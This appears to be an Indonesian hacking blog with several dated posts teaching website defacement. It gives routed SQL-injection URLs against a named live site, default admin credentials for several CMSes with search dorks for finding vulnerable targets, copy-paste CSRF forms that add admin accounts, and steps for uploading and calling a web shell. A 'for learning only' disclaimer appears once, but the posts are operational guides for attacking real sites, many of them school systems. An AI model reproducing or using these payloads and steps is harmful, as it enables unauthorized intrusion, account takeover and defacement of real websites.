Tuesday, June 23, 2020

Routed SQL-injection

Yow Whatsapp crew,
Wellcome back with me.
Kali ini gua bakal ngebahas Routed SQL-injection.

Bahan bahan :
- Kouta :v

Site :
http://www.jeffreycarbo.com/page.php?name=3

How to Inject
 http://www.jeffreycarbo.com/page.php?name=3 muncul error tapi jangan pedulikan hal tersebut karena itu adalah halaman normalnya

Ketika saya order by 2 muncul error http://www.jeffreycarbo.com/page.php?name=3'+order+by+2--+- tapi di order by 1 error tersebut hilang

Jadi saya union select menggunakan column 1 tersebut
http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+1--+- tapi tidak terjadi apa apa karena website tersebut vuln terhadap Routed sqli, cara mengetahuinya adalah

http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+1'--+-  ubah 1' menjadi hex jika normal berarti vuln terhadap Routed sqli

Lanjut ke exploit tambahkan seperti berikut
http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+"1'"--+- dan anggap saja angka 1 tersebut menjadi parameter, tapi jangan sampai hilangkan " "

Lalu kalian order by lagi di parameter "1'" Seperti berikut http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+"1'+order+by+7--+-"--+- kalian cari sampai error lalu kalian union select sepertu biasa :D

Dan hasilnya :
http://www.jeffreycarbo.com/page.php?name=3%27+and+0+/*!50000union*/+/*!50000select*/+%221+and+0+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8--+-%22--+-

Sekian materi kali ini,

Monday, June 15, 2020

Cara Deface Sistem Informasi Akademik U/P Default

Yow whatsapp, 
Wellcome back with me. 
Kali ini kita akan membahas proof of concept yang msh baru xixixi....
Yaitu Sisfo (Sistem Formasi Akademik) Default User and Pass. Bug ini terjadi karna kelalain admin. Kenapa bisa begitu? Ya karna si admin lupa untuk mengganti pass defaultnya sehingga kita bisa login ke dashboard admin menggunakan User dan Pass default. 

Bahan bahan :
- Kouta 
- Dork :
"Sisfo Login"
"Sistem Informasi Akdemik"
"Login | Sisfo"
*Kembangin lagi gayn
- Info login :
User : admin
Pass : admin
Atau
User : admin
Pass : admin123

Langsung aja :D
Pertama kalian dorking dulu menggunakan dork diatas xixi.. 

Nah akan otomatis ke halaman admin login, lalu kalian login menggunakan info login yang saya sediakan diatas... 

Jika vuln akan masuk ke dashboard admin :D
Seperti gambar dibawah ini. 

Cara Upload shellnya kalian ke bagian profil guru >> Upload shell
Lalu kalian refresh >> klik kanan pada img yang retak atau klik lama pada android >> buka gambar di tab baru.. 
Jika 403 Forbidden kalian bisa coba dengan cara di bawah ini :
Thanks to : ali

Sekian dari saya,
Always Study

Sunday, June 14, 2020

Default U/P On Cms Zya CBT

Yow Exploiter, 
Sorry gua jarang upload soalnya sibuk.
Langsung aja tanpa basa basi.

#Title : Default U/P On Cms Zya
#Dork : intext:"© achmadlutfi.wordpress.com"
#Author : Echhi atau Shandi1337
#Admin Login :
- www.echhixploit.com/index.php/manager
- www.echhixploit.com/[Path]index.php/manager
#User and Pass : admin

Kalian tinggal login ke admin login dengan user dan password diatas.
Boom berhasil login, xD
Artikel cukup singkat karna emng singkat :v
Note : Artikel ini hanya untuk pembelajaran, saya tidak bertanggung jawab jika jika ada penyalahgunaan.
Refrensi :
https://ecchiexploit.blogspot.com/2020/06/exploit-zyacbt-default-user-pass.html?m=1

Wednesday, June 10, 2020

Cara Deface Sistem kelulusan Add Admin

Yow Whatsapp guys,
Wellcome back with me.
 Kali ini kita akan membahas cara deface sistem kelulusan add admin, sama kyk cbt v2.8 add admin xixi..

Bahan bahan :
1.Kouta :v
2.Csrf :
Kalian copas aja..
<html>
<body>
<center>
<iframe width="560" height="315" src="https://www.youtube.com/embed/iQjtQvHwi4c" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
<hr>
<form action="http://localhost.com/[path]admin/tambahuser.php" method="POST">
<input type="text" class="form-control" name="nama" placeholder="Username" size="35">
<br>
<input type="text" class="form-control" name="username" placeholder="Spear" size="35">
<br>
<input type="text" class="form-control" name="pass" placeholder="Security" size="35">
<br>
<br>
<input type="submit" name="submit" id="submit" value="Simpan Data" class="btn btn-primary" onclick="tb_remove()">
</form>
<hr>
<h1> CODED BY SPEAR-SECURITY </h1>
<h2> Author Extinction </h2>
</body>
</html>
 Dork : intext:"Selamat datang di Sistem"
Author : Spear Security

Pertama kalian copy dan paste ke file csrf.html.
Kedua, ganti localhostnya jadi live target kalian.
Kalian masukan user dan password terserah kaliankalian >> klik simpan data. Jika berhasil akan seperti gambar dibawah.

Jika sudah kalian login, jika berhasil berarti vuln :D

Thursday, May 28, 2020

Candy CBT v2.8.0 r Add Admin

Yow Exploiter,
Kembali lagi ke My Blog xixi..
Kali ini kita akan belajar cara deface CBT v2.8.0 Add Admin yang di temukan oleh ecchiexploit

Bahan Bahan :
- Kouta :v
- Csrf :
*kalian copas aja
<html>
<head></head>
<body>
<form action="localhost/admin/?pg=pengawas" method="post">
<label>nip</label>
<input type="text" name="nip" value="123761717" required="true" />
<br>
<label>nama</label>
<input type="text" name="nama" required="true" />
<br>
<label>username</label>
<input type="text" name="username" required="true" />
<br>
<label>password</label>
<input type="password" name="pass1" required="true" />
<br>
<label>ulang password</label>
<input type="password" name="pass2" required="true" />
<br>
<button type="submit" name="submit">simpan</button>
</form>
</body>
</html>
- Dork :
"CBT v2.8.0" intitle:login
"Responsive Image" + "Support" intitle:Login
- Shell Backdoor

Langsung aja, pertama kalian dorking dulu pake dork diatas :D
Jangan lupa buat file csrf.html dan masukan kode diatas xixixi... 

Nah jika udah dapet live targetnya kalian buka file csrf.htmlnya lalu edit di bagian :
<body>
<form action="localhost/admin/?pg=pengawas" method="post">
Localhostnya kalian ganti menjadi live target kalian... 
Jika sudah kalian save filenya lalu buka di chrome atau browser kesayangan anda :v

Nah tampilannya akan seperti dibawah ini :
Tinggal kalian masukan terserah kalian xixix.. 
Tapi saya mengisi semuanya dengan admin hehehe

 Lalu klik simpan.
Kalian login dengan User Dan Pass yang kalian tadi pilih.

Jika Vuln Akan Langsung masuk Dashboad :D seperti gambar dibawah :
Cara upload shellnya :
Klik Pengaturan >> Lalu Ke Restore&Backup :D >> Up Shell Kalian >>  Lalu kalian klik buttonnya

Cara manggil shellnya :
contoh : namaweb.com/admin/namashellkalian.php
atau 
- namaweb.com/[Path]/admin/namashellkalian.php

Semoga Bermanfaat :D
Referensi :


Wednesday, May 27, 2020

Cara Deface Myhoian U/P default

Yow whatsapp guys,
Kembali lagi ke my blog xixix..
Kali ini kita akan deface metode Myhoian User Pass default.

Bahan bahan :
- Kouta :v
- Dork
"Design" + "myhoian"
"Design by myhoian.com"
- Info Login :
User : nhaplieu
Pass : 12345
~
User : nhaplieu
Pass : nguyenvu!@#
- Admin login :
namaweb.com/admin

Kalian ngedork dulu, pake dork diatas :v

Jika sudah, kalian masuk ke website dan akses adminnya dengan cara tambahkan /admin >> untuk mencari admin login xixix..

Tampilan loginnya akan seperti ini.
Kalian masuk menggunakan Info Login diatas xixi..
Jika Vuln akan masuk ke dashboard admin, lalu kalian tinggal up shell :D

Referensi :
https://draxploit.blogspot.com/2020/05/myhoian-default-userpass-admin-login.html?m=1